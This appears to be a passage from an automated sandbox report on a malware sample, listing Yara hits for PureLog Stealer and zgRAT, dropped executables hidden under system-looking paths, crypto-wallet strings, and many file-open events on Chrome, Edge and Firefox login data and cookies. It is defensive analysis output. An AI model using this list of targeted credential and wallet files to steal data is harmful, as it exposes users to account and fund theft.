                                    Source: Yara matchFile source: Process Memory Space: uAsLgsGzSk.exe PID: 7860, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: hz7DzW2Yop.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.hz7DzW2Yop.exe.6a4eee9.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.hz7DzW2Yop.exe.6250ee9.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.serverBrokerperfMonitor.exe.fe0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.hz7DzW2Yop.exe.6a4eee9.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.hz7DzW2Yop.exe.6250ee9.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1669057871.000000000620B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1669587198.0000000006A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000000.1829997271.0000000000FE2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\SystemSettings.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\HyperWebbroker\serverBrokerperfMonitor.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: hz7DzW2Yop.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.hz7DzW2Yop.exe.6a4eee9.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.hz7DzW2Yop.exe.6250ee9.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.serverBrokerperfMonitor.exe.fe0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.hz7DzW2Yop.exe.6a4eee9.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.hz7DzW2Yop.exe.6250ee9.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\SystemSettings.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\HyperWebbroker\serverBrokerperfMonitor.exe, type: DROPPED
                                    Found many strings related to Crypto-Wallets (likely being stolen)
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                                    Source: hz7DzW2Yop.exe, 00000000.00000003.1669057871.000000000620B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: GA4tjAxxEP
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                                    Source: serverBrokerperfMonitor.exe, 00000005.00000002.1900253467.000000000365D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: aholpfdialjgjfhomihkjbmgjidlcdno:Exodus
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                                    Source: hz7DzW2Yop.exe, 00000000.00000003.1669057871.000000000620B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                                    Tries to harvest and steal browser information (history, passwords, etc)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
